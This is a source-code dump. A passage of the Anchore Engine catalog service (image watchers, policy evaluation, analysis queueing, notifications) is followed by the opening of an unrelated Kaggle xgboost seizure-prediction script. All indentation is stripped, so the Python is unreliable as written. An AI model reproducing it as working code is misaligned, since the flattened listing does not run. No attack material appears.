subscription_records = db_subscriptions.get_byfilter(userId, session=dbsession, **dbfilter)
registry_creds = db_registries.get_byuserId(userId, session=dbsession)
try:
catalog_impl.refresh_registry_creds(registry_creds, dbsession)
except Exception as err:
logger.warn("failed to refresh registry credentials - exception: " + str(err))
alltags = []
for subscription_record in subscription_records:
if not subscription_record['active']:
continue
try:
fulltag = subscription_record['subscription_key']
if fulltag not in alltags:
alltags.append(fulltag)
except Exception as err:
logger.warn("problem creating taglist for image watcher - exception: " + str(err))
for registry_record in registry_creds:
try:
registry_status = docker_registry.ping_docker_registry(registry_record)
except Exception as err:
registry_record['record_state_key'] = 'auth_failure'
registry_record['record_state_val'] = str(int(time.time()))
logger.warn("registry ping failed - exception: " + str(err))
logger.debug("checking tags for update: " + str(userId) + " : " + str(alltags))
for fulltag in alltags:
event = None
try:
logger.debug("checking image latest info from registry: " + fulltag)
image_info = anchore_engine.common.images.get_image_info(userId, "docker", fulltag,
registry_lookup=True,
registry_creds=registry_creds)
logger.spew("checking image: got registry info: " + str(image_info))
manifest = None
try:
if 'manifest' in image_info:
try:
manifest = json.dumps(image_info['manifest'])
except Exception as err:
raise TagManifestParseError(cause=err, tag=fulltag, manifest=image_info['manifest'],
msg='Failed to serialize manifest into JSON formatted string')
else:
raise TagManifestNotFoundError(tag=fulltag, msg='No manifest from get_image_info')
except AnchoreException as e:
event = events.TagManifestParseFail(user_id=userId, tag=fulltag, error=e.to_dict())
raise
try:
dbfilter = {
'registry': image_info['registry'],
'repo': image_info['repo'],
'tag': image_info['tag'],
'digest': image_info['digest']
}
except Exception as err:
raise Exception("could not prepare db filter for complete lookup check - exception: " + str(err))
try:
stored_manifest = json.loads(obj_mgr.get_document(userId, 'manifest_data', image_info['digest']))
if not stored_manifest:
raise Exception("stored manifest is empty")
except Exception as err:
logger.debug("found empty/invalid stored manifest, storing new: " + str(err))
rc = obj_mgr.put_document(userId, 'manifest_data', image_info['digest'], manifest)
logger.debug("checking image: looking up image in db using dbfilter: " + str(dbfilter))
with db.session_scope() as dbsession:
record = db_catalog_image.get_byimagefilter(userId, 'docker', dbfilter, session=dbsession)
if record:
logger.debug("checking image: found match, no update, nothing to do: " + str(fulltag))
else:
logger.info(
"checking image: found latest digest for tag is not in DB: should update and queue for analysis: tag=" + str(
fulltag) + " latest_digest=" + str(dbfilter['digest']))
# get the set of existing digests
try:
last_dbfilter = {}
last_dbfilter.update(dbfilter)
last_dbfilter.pop('digest', None)
last_digests = []
last_annotations = {}
is_latest = True
with db.session_scope() as dbsession:
last_image_records = db_catalog_image.get_byimagefilter(userId, 'docker', last_dbfilter,
session=dbsession)
if last_image_records:
for last_image_record in last_image_records:
imageDigest = last_image_record['imageDigest']
for image_detail in last_image_record['image_detail']:
last_digests.append(image_detail['digest'])
# only do this (bring forward annotations) for the first found digest (last digest associated with tag)
if is_latest:
if not last_annotations and last_image_record['annotations']:
try:
if last_image_record.get('annotations', '{}'):
last_annotations.update(
json.loads(last_image_record.get('annotations', '{}')))
except:
pass
is_latest = False
except Exception as err:
logger.error(str(err))
# add and store the new image
with db.session_scope() as dbsession:
logger.debug("adding new image from tag watcher " + str(image_info))
image_records = catalog_impl.add_or_update_image(dbsession, userId, image_info['imageId'],
tags=[image_info['fulltag']],
digests=[image_info['fulldigest']],
parentdigest=image_info.get('parentdigest', None),
manifest=manifest,
annotations=last_annotations)
if image_records:
image_record = image_records[0]
else:
image_record = {}
logger.info("checking image: added new image: " + str(image_record))
new_digests = [image_info['digest']]
# construct the notification and queue
try:
npayload = {
'last_eval': last_digests,
'curr_eval': new_digests,
}
if last_annotations:
npayload['annotations'] = last_annotations
rc = notifications.queue_notification(userId, fulltag, 'tag_update', npayload)
logger.debug("queued image tag update notification: " + fulltag)
# inobj = {
# 'userId': userId,
# 'subscription_key':fulltag,
# 'notificationId': str(uuid.uuid4()),
# 'last_eval':last_digests,
# 'curr_eval':new_digests,
# }
# if not simplequeue.is_inqueue(system_user_auth, 'tag_update', inobj):
# qobj = simplequeue.enqueue(system_user_auth, 'tag_update', inobj)
# logger.debug("queued image tag update notification: " + fulltag)
except Exception as err:
logger.error("failed to queue tag update notification - exception: " + str(err))
raise err
except Exception as err:
logger.error("failed to check/update image - exception: " + str(err))
finally:
if event:
_add_event(event)
logger.debug("FIRING DONE: " + str(watcher))
try:
kwargs['mythread']['last_return'] = handler_success
except:
pass
if anchore_engine.subsys.metrics.is_enabled() and handler_success:
anchore_engine.subsys.metrics.summary_observe('anchore_monitor_runtime_seconds', time.time() - timer,
function=watcher, status="success")
else:
anchore_engine.subsys.metrics.summary_observe('anchore_monitor_runtime_seconds', time.time() - timer,
function=watcher, status="fail")
return (True)
def _add_event(event, quiet=True):
try:
with db.session_scope() as dbsession:
db_events.add(event.to_dict(), dbsession)
logger.debug("queueing event creation notification")
npayload = {'event': event.to_dict()}
rc = notifications.queue_notification(event.user_id, subscription_key=event.level,
subscription_type='event_log', payload=npayload)
except:
if quiet:
logger.exception('Ignoring error creating/notifying event: {}'.format(event))
else:
raise
def check_feedmeta_update(dbsession):
global feed_sync_updated
return (feed_sync_updated)
def check_policybundle_update(userId, dbsession):
global bundle_user_last_updated
is_updated = True
try:
last_bundle_update = 0
active_policy_record = db_policybundle.get_active_policy(userId, session=dbsession)
if active_policy_record:
last_bundle_update = active_policy_record['last_updated']
else:
logger.warn("user has no active policy - queueing just in case" + str(userId))
return (is_updated)
if userId not in bundle_user_last_updated:
bundle_user_last_updated[userId] = last_bundle_update
if last_bundle_update == bundle_user_last_updated[userId]:
logger.debug("no bundle update detected since last cycle")
is_updated = False
else:
logger.debug("bundle update detected since last cycle")
bundle_user_last_updated[userId] = last_bundle_update
is_updated = True
except Exception as err:
logger.warn("failed to get/parse active policy bundle for user (" + str(userId) + ") - exception: " + str(err))
bundle_user_last_updated[userId] = 0
is_updated = True
return (is_updated)
def handle_policyeval(*args, **kwargs):
global system_user_auth, bundle_user_is_updated, feed_sync_updated
watcher = str(kwargs['mythread']['taskType'])
handler_success = True
timer = time.time()
logger.debug("FIRING: " + str(watcher))
try:
all_ready = anchore_engine.clients.services.common.check_services_ready(['policy_engine', 'simplequeue'])
if not all_ready:
logger.debug("FIRING DONE: policy eval (skipping due to required services not being available)")
try:
kwargs['mythread']['last_return'] = False
except:
pass
return (True)
with db.session_scope() as dbsession:
feed_updated = check_feedmeta_update(dbsession)
mgr = manager_factory.for_session(dbsession)
accounts = mgr.list_accounts(with_state=AccountStates.enabled, include_service=False)
for account in accounts:
userId = account['name']
# policy evaluations
doperform = False
policy_subs = []
for subscription_type in ['policy_eval']:
dbfilter = {'subscription_type': subscription_type}
with db.session_scope() as dbsession:
subscription_records = db_subscriptions.get_byfilter(userId, session=dbsession, **dbfilter)
for subscription_record in subscription_records:
if subscription_record['active']:
image_info = anchore_engine.common.images.get_image_info(userId, "docker", subscription_record[
'subscription_key'], registry_lookup=False, registry_creds=(None, None))
dbfilter = {'registry': image_info['registry'], 'repo': image_info['repo'],
'tag': image_info['tag']}
if (dbfilter, subscription_record['subscription_value']) not in policy_subs:
policy_subs.append((dbfilter, subscription_record['subscription_value']))
for (dbfilter, value) in policy_subs:
with db.session_scope() as dbsession:
image_records = db_catalog_image.get_byimagefilter(userId, 'docker', dbfilter=dbfilter,
onlylatest=False, session=dbsession)
if value:
try:
subscription_value = json.loads(value)
digests = set(subscription_value['digests'])
except Exception as err:
digests = set()
else:
digests = set()
# always add latest version of the image
if len(image_records) > 0:
digests.add(image_records[0]['imageDigest'])
for image_record in image_records:
if image_record['analysis_status'] == taskstate.complete_state('analyze'):
imageDigest = image_record['imageDigest']
if imageDigest not in digests:
continue
fulltag = dbfilter['registry'] + "/" + dbfilter['repo'] + ":" + dbfilter['tag']
# TODO - checks to avoid performing eval if nothing has changed
doperform = True
if doperform:
logger.debug("calling policy eval perform: " + str(fulltag) + " : " + str(imageDigest))
with db.session_scope() as dbsession:
try:
rc = catalog_impl.perform_policy_evaluation(userId, imageDigest, dbsession,
evaltag=fulltag)
except Exception as err:
logger.warn("policy evaluation failed - exception: " + str(err))
except Exception as err:
logger.warn("failure in policy eval / vuln scan handler - exception: " + str(err))
logger.debug("FIRING DONE: " + str(watcher))
try:
kwargs['mythread']['last_return'] = handler_success
except:
pass
if anchore_engine.subsys.metrics.is_enabled() and handler_success:
anchore_engine.subsys.metrics.summary_observe('anchore_monitor_runtime_seconds', time.time() - timer,
function=watcher, status="success")
else:
anchore_engine.subsys.metrics.summary_observe('anchore_monitor_runtime_seconds', time.time() - timer,
function=watcher, status="fail")
return (True)
def handle_analyzer_queue(*args, **kwargs):
global system_user_auth
watcher = str(kwargs['mythread']['taskType'])
handler_success = True
timer = time.time()
logger.debug("FIRING: " + str(watcher))
localconfig = anchore_engine.configuration.localconfig.get_config()
obj_mgr = object_store.get_manager()
try:
max_working_time = int(localconfig['image_analyze_timeout_seconds'])
except:
max_working_time = 36000
all_ready = anchore_engine.clients.services.common.check_services_ready(['policy_engine', 'simplequeue'])
if not all_ready:
logger.debug("FIRING DONE: analyzer queuer (skipping due to required services not being available)")
try:
kwargs['mythread']['last_return'] = False
except:
pass
return (True)
with db.session_scope() as dbsession:
mgr = manager_factory.for_session(dbsession)
accounts = mgr.list_accounts(include_service=False)
q_client = internal_client_for(SimpleQueueClient, userId=None)
for account in accounts:
userId = account['name']
if account['type'] == AccountTypes.service: # userId == 'anchore-system':
continue
# do this in passes, for each analysis_status state
with db.session_scope() as dbsession:
dbfilter = {'analysis_status': taskstate.working_state('analyze')}
workingstate_image_records = db_catalog_image.get_byfilter(userId, session=dbsession, **dbfilter)
# first, evaluate images looking for those that have been in working state for too long and reset
for image_record in workingstate_image_records:
imageDigest = image_record['imageDigest']
if image_record['image_status'] == taskstate.complete_state('image_status'):
state_time = int(time.time()) - image_record['last_updated']
logger.debug("image in working state for (" + str(state_time) + ")s - " + str(imageDigest))
if state_time > max_working_time:
logger.warn("image has been in working state (" + str(
taskstate.working_state('analyze')) + ") for over (" + str(
max_working_time) + ") seconds - resetting and requeueing for analysis")
image_record['analysis_status'] = taskstate.reset_state('analyze')
with db.session_scope() as dbsession:
db_catalog_image.update_record(image_record, session=dbsession)
# next, look for any image in base state (not_analyzed) for queuing
with db.session_scope() as dbsession:
dbfilter = {'analysis_status': taskstate.base_state('analyze')}
# dbfilter = {}
basestate_image_records = db_catalog_image.get_byfilter(userId, session=dbsession, **dbfilter)
for basestate_image_record in basestate_image_records:
imageDigest = basestate_image_record['imageDigest']
image_record = basestate_image_record
# dbfilter = {'imageDigest': imageDigest}
# with db.session_scope() as dbsession:
# image_records = db.db_catalog_image.get_byfilter(userId, session=dbsession, **dbfilter)
# image_record = image_records[0]
if image_record['image_status'] == taskstate.complete_state('image_status'):
logger.debug("image check")
if image_record['analysis_status'] == taskstate.base_state('analyze'):
logger.debug("image in base state - " + str(imageDigest))
try:
manifest = obj_mgr.get_document(userId, 'manifest_data', image_record['imageDigest'])
except Exception as err:
logger.debug("failed to get manifest - {}".format(str(err)))
manifest = {}
qobj = {}
qobj['userId'] = userId
qobj['imageDigest'] = image_record['imageDigest']
qobj['manifest'] = manifest
try:
if not q_client.is_inqueue('images_to_analyze', qobj):
# queue image for analysis
logger.debug("queued image for analysis: " + str(imageDigest))
qobj = q_client.enqueue('images_to_analyze', qobj)
# set the appropriate analysis state for image
# image_record['analysis_status'] = taskstate.queued_state('analyze')
# image_record['analysis_status'] = taskstate.working_state('analyze')
# with db.session_scope() as dbsession:
# rc = db.db_catalog_image.update_record(image_record, session=dbsession)
else:
logger.debug("image already queued")
except Exception as err:
logger.error("failed to check/queue image for analysis - exception: " + str(err))
logger.debug("FIRING DONE: " + str(watcher))
try:
kwargs['mythread']['last_return'] = handler_success
except:
pass
if anchore_engine.subsys.metrics.is_enabled() and handler_success:
anchore_engine.subsys.metrics.summary_observe('anchore_monitor_runtime_seconds', time.time() - timer,
function=watcher, status="success")
else:
anchore_engine.subsys.metrics.summary_observe('anchore_monitor_runtime_seconds', time.time() - timer,
function=watcher, status="fail")
return (True)
def handle_notifications(*args, **kwargs):
global system_user_auth
watcher = str(kwargs['mythread']['taskType'])
handler_success = True
timer = time.time()
logger.debug("FIRING: " + str(watcher))
q_client = internal_client_for(SimpleQueueClient, userId=None)
with db.session_scope() as dbsession:
mgr = manager_factory.for_session(dbsession)
localconfig = anchore_engine.configuration.localconfig.get_config()
try:
notification_timeout = int(localconfig['webhooks']['notification_retry_timeout'])
except:
notification_timeout = 30
logger.debug("notification timeout: " + str(notification_timeout))
# get the event log notification config
try:
event_log_config = localconfig.get('services', {}).get('catalog', {}).get('event_log', None)
if event_log_config and 'notification' in event_log_config:
notify_events = event_log_config.get('notification').get('enabled', False)
if notify_events and 'level' in event_log_config.get('notification'):
event_levels = event_log_config.get('notification').get('level')
event_levels = [level.lower() for level in event_levels]
else:
event_levels = None
else:
notify_events = False
event_levels = None
except:
logger.exception('Ignoring errors parsing for event_log configuration')
notify_events = False
event_levels = None
# regular event queue notifications + event log notification
event_log_type = 'event_log'
for subscription_type in anchore_engine.common.subscription_types + [event_log_type]:
logger.debug("notifier: " + subscription_type)
accounts = mgr.list_accounts(with_state=AccountStates.enabled, include_service=False)
try:
qlen = q_client.qlen(subscription_type)
except Exception as err:
logger.debug(
"problem looking for notifications in queue: " + str(subscription_type) + " - exception: " + str(
err))
qlen = 0
while (qlen > 0):
pupdate_record = q_client.dequeue(subscription_type)
if pupdate_record:
logger.debug("got notification from queue: " + json.dumps(pupdate_record, indent=4))
notification = pupdate_record['data']
userId = notification['userId']
subscription_key = notification['subscription_key']
notificationId = notification['notificationId']
for account in accounts:
try:
if userId == account['name']:
notification_record = None
if subscription_type in anchore_engine.common.subscription_types:
dbfilter = {'subscription_type': subscription_type,
'subscription_key': subscription_key}
subscription_records = db_subscriptions.get_byfilter(account['name'],
session=dbsession, **dbfilter)
if subscription_records:
subscription = subscription_records[0]
if subscription and subscription['active']:
notification_record = notifications.make_notification(account,
subscription_type,
notification)
elif subscription_type == event_log_type: # handle event_log differently since its not a type of subscriptions
if notify_events and (
event_levels is None or subscription_key.lower() in event_levels):
notification.pop('subscription_key',
None) # remove subscription_key property from notification
notification_record = notifications.make_notification(account, subscription_type,
notification)
if notification_record:
logger.spew("Storing NOTIFICATION: " + str(account) + str(notification_record))
db_queues.add(subscription_type, userId, notificationId, notification_record, 0,
int(time.time() + notification_timeout), session=dbsession)
except Exception as err:
import traceback
traceback.print_exc()
logger.warn("cannot store notification to DB - exception: " + str(err))
qlen = q_client.qlen(subscription_type)
for account in accounts:
notification_records = db_queues.get_all(subscription_type, account['name'], session=dbsession)
for notification_record in notification_records:
logger.debug("drained to send: " + json.dumps(notification_record))
try:
rc = notifications.notify(account, notification_record)
if rc:
db_queues.delete_record(notification_record, session=dbsession)
except Exception as err:
logger.debug("failed to send notification, storing for retry - exception: " + str(err))
notification_record['tries'] = int(time.time())
if notification_record['tries'] > notification_record['max_tries']:
logger.error("hit max notification timeout: dropping notificaion")
db_queues.delete_record(notification_record, session=dbsession)
else:
db_queues.update_record(notification_record, session=dbsession)
logger.debug("FIRING DONE: " + str(watcher))
try:
kwargs['mythread']['last_return'] = handler_success
except:
pass
if anchore_engine.subsys.metrics.is_enabled() and handler_success:
anchore_engine.subsys.metrics.summary_observe('anchore_monitor_runtime_seconds', time.time() - timer,
function=watcher, status="success")
else:
anchore_engine.subsys.metrics.summary_observe('anchore_monitor_runtime_seconds', time.time() - timer,
function=watcher, status="fail")
return (True)
def handle_metrics(*args, **kwargs):
cycle_timer = kwargs['mythread']['cycle_timer']
while (True):
# perform some DB read/writes for metrics gathering
if anchore_engine.subsys.metrics.is_enabled():
# DB probes
anchore_record = None
try:
with anchore_engine.subsys.metrics.get_summary_obj("anchore_db_read_seconds").time() as mtimer:
with db.session_scope() as dbsession:
anchore_record = db_anchore.get(session=dbsession)
except Exception as err:
logger.warn("unable to perform DB read probe - exception: " + str(err))
if anchore_record:
try:
with anchore_engine.subsys.metrics.get_summary_obj("anchore_db_write_seconds").time() as mtimer:
with db.session_scope() as dbsession:
anchore_record['record_state_val'] = str(time.time())
rc = db_anchore.update_record(anchore_record, session=dbsession)
except Exception as err:
logger.warn("unable to perform DB write probe - exception: " + str(err))
try:
with anchore_engine.subsys.metrics.get_summary_obj("anchore_db_readwrite_seconds").time() as mtimer:
with db.session_scope() as dbsession:
anchore_record = db_anchore.get(session=dbsession)
anchore_record['record_state_val'] = str(time.time())
rc = db_anchore.update_record(anchore_record, session=dbsession)
except Exception as err:
logger.warn("unable to perform DB read/write probe - exception: " + str(err))
# FS probes
localconfig = anchore_engine.configuration.localconfig.get_config()
try:
tmpdir = localconfig['tmp_dir']
svfs = os.statvfs(tmpdir)
available_bytes = svfs.f_bsize * svfs.f_bavail
anchore_engine.subsys.metrics.gauge_set("anchore_tmpspace_available_bytes", available_bytes)
except Exception as err:
logger.warn("unable to detect available bytes probe - exception: " + str(err))
time.sleep(cycle_timer)
def handle_archive_tasks(*args, **kwargs):
"""
Handles periodic scan tasks for archive rule processing
:param args:
:param kwargs:
:return:
"""
watcher = str(kwargs['mythread']['taskType'])
handler_success = True
start_time = time.time()
logger.debug("FIRING: " + str(watcher))
task_id = None
try:
logger.info('Starting analysis archive transition rule processor')
with db.session_scope() as session:
# Get accounts that have rules
accounts = session.query(ArchiveTransitionRule.account).distinct(ArchiveTransitionRule.account).all()
if accounts:
accounts = [x[0] for x in accounts]
logger.debug('Found accounts {} with transition rules'.format(accounts))
for account in accounts:
task = archiver.ArchiveTransitionTask(account)
task_id = task.task_id
logger.info('Starting archive transition task {} for account {}'.format(task.task_id, account))
task.run()
logger.info('Archive transition task {} complete'.format(task.task_id))
except Exception as ex:
logger.exception('Caught unexpected exception')
finally:
logger.debug('Analysis archive task {} execution time: {} seconds'.format(task_id, time.time() - start_time))
logger.debug('Sleeping until next cycle since no messages to process')
return True
click = 0
running = False
last_run = 0
system_user_auth = ('anchore-system', '')
# policy update check data
feed_sync_updated = False
bundle_user_last_updated = {}
bundle_user_is_updated = {}
default_lease_ttl = 60 # 1 hour ttl, should be more than enough in most cases
def watcher_func(*args, **kwargs):
global system_user_auth
while (True):
logger.debug("starting generic watcher")
all_ready = anchore_engine.clients.services.common.check_services_ready(['simplequeue'])
if not all_ready:
logger.info("simplequeue service not yet ready, will retry")
else:
q_client = internal_client_for(SimpleQueueClient, userId=None)
lease_id = None
try:
logger.debug("attempting dequeue")
qobj = q_client.dequeue('watcher_tasks', max_wait_seconds=30)
logger.debug("dequeue complete")
if qobj:
logger.debug("got task from queue: " + str(qobj))
watcher = qobj['data']['watcher']
handler = watchers[watcher]['handler']
args = []
kwargs = {'mythread': watchers[watcher]}
lease_id = watchers[watcher]['task_lease_id']
# Old way
timer = time.time()
if not lease_id:
logger.debug(
'No task lease defined for watcher {}, initiating without lock protection'.format(watcher))
rc = handler(*args, **kwargs)
else:
rc = simplequeue.run_target_with_lease(None, lease_id, handler,
ttl=default_lease_ttl, *args, **kwargs)
else:
logger.debug("nothing in queue")
except (simplequeue.LeaseAcquisitionFailedError, simplequeue.LeaseUnavailableError) as e:
logger.debug('Lease acquisition could not complete, but this is probably due to another process with the lease: {}'.format(e))
except Exception as err:
logger.warn("failed to process task this cycle: " + str(err))
logger.debug("generic watcher done")
time.sleep(5)
def schedule_watcher(watcher):
global watchers, watcher_task_template, system_user_auth
if watcher not in watchers:
logger.warn("input watcher {} not in list of available watchers {}".format(watcher, list(watchers.keys())))
return (False)
if watchers[watcher]['taskType']:
logger.debug("should queue job: " + watcher)
watcher_task = copy.deepcopy(watcher_task_template)
watcher_task['watcher'] = watcher
watcher_task['taskType'] = watchers[watcher]['taskType']
try:
q_client = internal_client_for(SimpleQueueClient, userId=None)
if not q_client.is_inqueue('watcher_tasks', watcher_task):
qobj = q_client.enqueue('watcher_tasks', watcher_task)
logger.debug(str(watcher_task) + ": init task queued: " + str(qobj))
else:
logger.debug(str(watcher_task) + ": init task already queued")
watchers[watcher]['last_queued'] = time.time()
except Exception as err:
logger.warn("failed to enqueue watcher task: " + str(err))
return (True)
def monitor_func(**kwargs):
global click, running, last_queued, system_user_auth, watchers, last_run
if click < 5:
click = click + 1
logger.debug("Catalog monitor starting in: " + str(5 - click))
return (True)
if running or ((time.time() - last_run) < kwargs['kick_timer']):
return (True)
logger.debug("FIRING: catalog_monitor")
try:
localconfig = anchore_engine.configuration.localconfig.get_config()
system_user_auth = localconfig['system_user_auth']
for watcher in list(watchers.keys()):
if not watchers[watcher]['initialized']:
# first time
if 'cycle_timers' in kwargs and watcher in kwargs['cycle_timers']:
try:
the_cycle_timer = watchers[watcher]['cycle_timer']
min_cycle_timer = watchers[watcher]['min_cycle_timer']
max_cycle_timer = watchers[watcher]['max_cycle_timer']
config_cycle_timer = int(kwargs['cycle_timers'][watcher])
if config_cycle_timer < 0:
the_cycle_timer = abs(int(config_cycle_timer))
elif config_cycle_timer < min_cycle_timer:
logger.warn("configured cycle timer for handler (" + str(
watcher) + ") is less than the allowed min (" + str(
min_cycle_timer) + ") - using allowed min")
the_cycle_timer = min_cycle_timer
elif config_cycle_timer > max_cycle_timer:
logger.warn("configured cycle timer for handler (" + str(
watcher) + ") is greater than the allowed max (" + str(
max_cycle_timer) + ") - using allowed max")
the_cycle_timer = max_cycle_timer
else:
the_cycle_timer = config_cycle_timer
watchers[watcher]['cycle_timer'] = the_cycle_timer
except Exception as err:
logger.warn(
"exception setting custom cycle timer for handler (" + str(watcher) + ") - using default")
watchers[watcher]['initialized'] = True
if watcher not in watcher_threads:
if watchers[watcher]['taskType']:
# spin up a generic task watcher
logger.debug("starting generic task thread")
watcher_threads[watcher] = threading.Thread(target=watcher_func, args=[watcher], kwargs={})
watcher_threads[watcher].start()
else:
# spin up a specific looping watcher thread
watcher_threads[watcher] = threading.Thread(target=watchers[watcher]['handler'],
args=watchers[watcher]['args'],
kwargs={'mythread': watchers[watcher]})
watcher_threads[watcher].start()
all_ready = anchore_engine.clients.services.common.check_services_ready(['simplequeue'])
if not all_ready:
logger.info("simplequeue service not yet ready, will retry")
elif time.time() - watchers[watcher]['last_queued'] > watchers[watcher]['cycle_timer']:
rc = schedule_watcher(watcher)
except Exception as err:
logger.error(str(err))
finally:
logger.debug("FIRING DONE: catalog_monitor")
running = False
last_run = time.time()
logger.debug("exiting monitor thread")
monitor_thread = None
def monitor(*args, **kwargs):
global monitor_thread
try:
donew = False
if monitor_thread:
if monitor_thread.isAlive():
logger.spew("MON: thread still running")
else:
logger.spew("MON: thread stopped running")
donew = True
monitor_thread.join()
logger.spew("MON: thread joined: isAlive=" + str(monitor_thread.isAlive()))
else:
logger.spew("MON: no thread")
donew = True
if donew:
logger.spew("MON: starting")
monitor_thread = threading.Thread(target=monitor_func, kwargs=kwargs)
monitor_thread.start()
else:
logger.spew("MON: skipping")
except Exception as err:
logger.warn("MON thread start exception: " + str(err))
class CatalogService(ApiService):
__service_name__ = 'catalog'
__spec_dir__ = pkg_resources.resource_filename(__name__, 'swagger')
__monitor_fn__ = monitor
def _register_instance_handlers(self):
super()._register_instance_handlers()
self.register_handler(LifeCycleStages.post_db, self._init_object_storage, {})
self.register_handler(LifeCycleStages.post_register, self._init_policies, {})
def _init_object_storage(self):
try:
did_init = object_store.initialize(self.configuration, manager_id=DEFAULT_OBJECT_STORE_MANAGER_ID, config_keys=[DEFAULT_OBJECT_STORE_MANAGER_ID, ALT_OBJECT_STORE_CONFIG_KEY], allow_legacy_fallback=True)
if not did_init:
logger.warn('Unexpectedly found the object store already initialized. This is not an expected condition. Continuting with driver: {}'.format(object_store.get_manager().primary_client.__config_name__))
except Exception as err:
logger.exception("Error initializing the object store: check catalog configuration")
raise err
try:
archive.initialize(self.configuration)
except Exception as err:
logger.exception("Error initializing analysis archive: check catalog configuration")
raise err
def _init_policies(self):
"""
Ensure all accounts have a default policy in place
:return:
"""
obj_mgr = object_store.get_manager()
with db.session_scope() as dbsession:
mgr = manager_factory.for_session(dbsession)
for account_dict in mgr.list_accounts(include_service=False):
try:
logger.info('Initializing a new account')
userId = account_dict['name'] # Old keys are userId, now that maps to account name
bundle_records = db_policybundle.get_all_byuserId(userId, session=dbsession)
if not bundle_records:
logger.debug("Account {} has no policy bundle - installing default".format(userId))
config = self.global_configuration
if config.get('default_bundle_file', None) and os.path.exists(config['default_bundle_file']):
logger.info("loading def bundle: " + str(config['default_bundle_file']))
try:
default_bundle = {}
with open(config['default_bundle_file'], 'r') as FH:
default_bundle = json.loads(FH.read())
if default_bundle:
bundle_url = obj_mgr.put_document(userId, 'policy_bundles', default_bundle['id'],
default_bundle)
policy_record = make_policy_record(userId, default_bundle, active=True)
rc = db_policybundle.add(policy_record['policyId'], userId, True, policy_record,
session=dbsession)
if not rc:
raise Exception("policy bundle DB add failed")
except Exception as err:
if isinstance(err, IntegrityError):
logger.warn("another process has already initialized, continuing")
else:
logger.error("could not load up default bundle for user - exception: " + str(err))
except Exception as err:
if isinstance(err, IntegrityError):
logger.warn("another process has already initialized, continuing")
else:
raise Exception("unable to initialize default user data - exception: " + str(err))
watchers = {
'image_watcher': {'handler': handle_image_watcher, 'task_lease_id': 'image_watcher',
'taskType': 'handle_image_watcher', 'args': [], 'cycle_timer': 600, 'min_cycle_timer': 300,
'max_cycle_timer': 86400 * 7, 'last_queued': 0, 'last_return': False, 'initialized': False},
'repo_watcher': {'handler': handle_repo_watcher, 'task_lease_id': 'repo_watcher', 'taskType': 'handle_repo_watcher',
'args': [], 'cycle_timer': 60, 'min_cycle_timer': 60, 'max_cycle_timer': 86400 * 7,
'last_queued': 0, 'last_return': False, 'initialized': False},
'policy_eval': {'handler': handle_policyeval, 'task_lease_id': 'policy_eval', 'taskType': 'handle_policyeval',
'args': [], 'cycle_timer': 300, 'min_cycle_timer': 60, 'max_cycle_timer': 86400 * 2,
'last_queued': 0, 'last_return': False, 'initialized': False},
'analyzer_queue': {'handler': handle_analyzer_queue, 'task_lease_id': 'analyzer_queue',
'taskType': 'handle_analyzer_queue', 'args': [], 'cycle_timer': 5, 'min_cycle_timer': 1,
'max_cycle_timer': 7200, 'last_queued': 0, 'last_return': False, 'initialized': False},
'notifications': {'handler': handle_notifications, 'task_lease_id': 'notifications',
'taskType': 'handle_notifications', 'args': [], 'cycle_timer': 10, 'min_cycle_timer': 10,
'max_cycle_timer': 86400 * 2, 'last_queued': 0, 'last_return': False, 'initialized': False},
'vulnerability_scan': {'handler': handle_vulnerability_scan, 'task_lease_id': 'vulnerability_scan',
'taskType': 'handle_vulnerability_scan', 'args': [], 'cycle_timer': 300,
'min_cycle_timer': 60, 'max_cycle_timer': 86400 * 2, 'last_queued': 0, 'last_return': False,
'initialized': False},
'account_resource_cleanup': {'handler': handle_account_resource_cleanup, 'task_lease_id': 'account_resource_cleanup',
'taskType': 'handle_account_resource_cleanup', 'args': [], 'cycle_timer': 30,
'min_cycle_timer': 30, 'max_cycle_timer': 30, 'last_queued': 0, 'last_return': False,
'initialized': False},
'service_watcher': {'handler': handle_service_watcher, 'task_lease_id': False, 'taskType': None, 'args': [],
'cycle_timer': 10, 'min_cycle_timer': 1, 'max_cycle_timer': 300, 'last_queued': 0,
'last_return': False, 'initialized': False},
'service_heartbeat': {'handler': anchore_engine.subsys.servicestatus.handle_service_heartbeat,
'task_lease_id': False, 'taskType': None, 'args': [CatalogService.__service_name__],
'cycle_timer': 60, 'min_cycle_timer': 60, 'max_cycle_timer': 60, 'last_queued': 0,
'last_return': False, 'initialized': False},
'handle_metrics': {'handler': handle_metrics, 'task_lease_id': False, 'taskType': None, 'args': [],
'cycle_timer': 60, 'min_cycle_timer': 60, 'max_cycle_timer': 60, 'last_queued': 0,
'last_return': False, 'initialized': False},
'archive_tasks': {'handler': handle_archive_tasks, 'task_lease_id': 'archive_transitions', 'taskType': 'handle_archive_tasks', 'args': [], 'cycle_timer': 43200,
'min_cycle_timer': 60, 'max_cycle_timer': 86400 * 5, 'last_queued': 0, 'last_return': False,
'initialized': False},
}
watcher_task_template = {
'taskType': None,
'watcher': None,
}
watcher_threads = {}
|
seizure-boost-0-6-lb.py
|
# coding: utf-8
__author__ = 'ZFTurbo: https://kaggle.com/zfturbo'
import datetime
import pandas as pd
import numpy as np
import xgboost as xgb
from sklearn.cross_validation import KFold
from sklearn.metrics import roc_auc_score
from scipy.io import loadmat
from operator import itemgetter
import random
import os
import time
import glob
import re
from multiprocessing import Process
import copy
random.seed(2016)
np.random.seed(2016)
def natural_key(string_):
return [int(s) if s.isdigit() else s for s in re.split(r'(\d+)', string_)]
def create_feature_map(features):
outfile = open('xgb.fmap', 'w')
for i, feat in enumerate(features):
outfile.write('{0}\t{1}\tq\n'.format(i, feat))
outfile.close()
def get_importance(gbm, features):
create_feature_map(features)
importance = gbm.get_fscore(fmap='xgb.fmap')
importance = sorted(importance.items(), key=itemgetter(1), reverse=True)
return importance
def intersect(a, b):
return list(set(a) & set(b))
def print_features_importance(imp):
for i in range(len(imp)):
print("# " + str(imp[i][1]))
print('output.remove(\'' + imp[i][0] + '\')')
def mat_to_pandas(path):
mat = loadmat(path)
names = mat['dataStruct'].dtype.names
ndata = {n: mat['dataStruct'][n][0, 0] for n in names}
sequence = -1
if 'sequence' in names:
sequence = mat['dataStruct']['sequence']
return pd.DataFrame(ndata['data'], columns=ndata['channelIndices'][0]), sequence
def create_simple_csv_train(patient_id):
out = open("simple_train_" + str(patient_id) + ".csv", "w")
out.write("Id,sequence_id,patient_id")
for i in range(16):
out.write(",avg_" + str(i))
out.write(",file_size,result\n")
# TRAIN (0)
out_str = ''
files = sorted(glob.glob("../input/train_" + str(patient_id) + "/*0.mat"), key=natural_key)
sequence_id = 0
total = 0
for fl in files:
total += 1
